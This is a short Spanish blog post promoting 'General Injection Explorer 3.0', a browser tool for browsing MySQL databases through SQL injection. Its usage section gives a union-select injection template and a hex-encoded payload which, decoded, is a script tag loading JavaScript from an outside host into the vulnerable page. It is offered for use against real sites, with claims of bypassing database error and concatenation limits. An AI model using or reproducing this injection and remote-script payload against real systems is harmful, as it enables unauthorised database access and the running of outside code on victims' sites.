General Injection Explorer 3.0

Anteriormente publique SQL-PwnZ 1.1 una herramienta para realizar inyecciones SQL. La que les traigo hoy es más amigable y solo necesitan usar el navegador, se llama General Injection Explorer 3.0 y fue creada por PonyMagic.

[?] ¿Que es?
Básicamente es un explorador de bases de datos MySQL via SQLi, “incrustado” en la inyección.

[!] ¿Que tiene la versión 3.0?
[+] Codeado desde 0.
[+] Bypasseo de “illegal operation”, y limite de group_concat_max_len.
[+] Mejor manejo de CSS && DIVS.
[+] Peticiones realizadas con AJAX.
[+] Nueva forma de ver tablas, MUCHO mas ordenadas.

[?] ¿Como se usa?
En una SQLi, unís otro select y marcas las columnas ( id=-1 union select 1,2,3,4,5 )
En un valor que printee (que se muestre en la web), simplemente copias y pegas el código de la GIE.

(0x3c736372697074207372633d22687474703a2f2f7669727475782e636f6d2e61722f4749452f5f2e6a732220747970653d22746578742f6a617661736372697074223e3c2f7363726970743e)

Ejemplo:
Normal: tales.php?id=-1 union select 0,1,2,3,4,5,6,7,8,9–
Con GIE: tales.php?id=-1 union select 0,1,(0x3c736372697074207372633d22687474703a2f2f7669727475782e636f6d2e61722f4749452f5f2e6a7322207479
70653d22746578742f6a617661736372697074223e3c2f7363726970743e),3,4,5,6,7,8,9–

En el siguiente gif pueden ver como funciona:

Deja un comentario

Tu dirección de correo electrónico no será publicada. Los campos obligatorios están marcados con *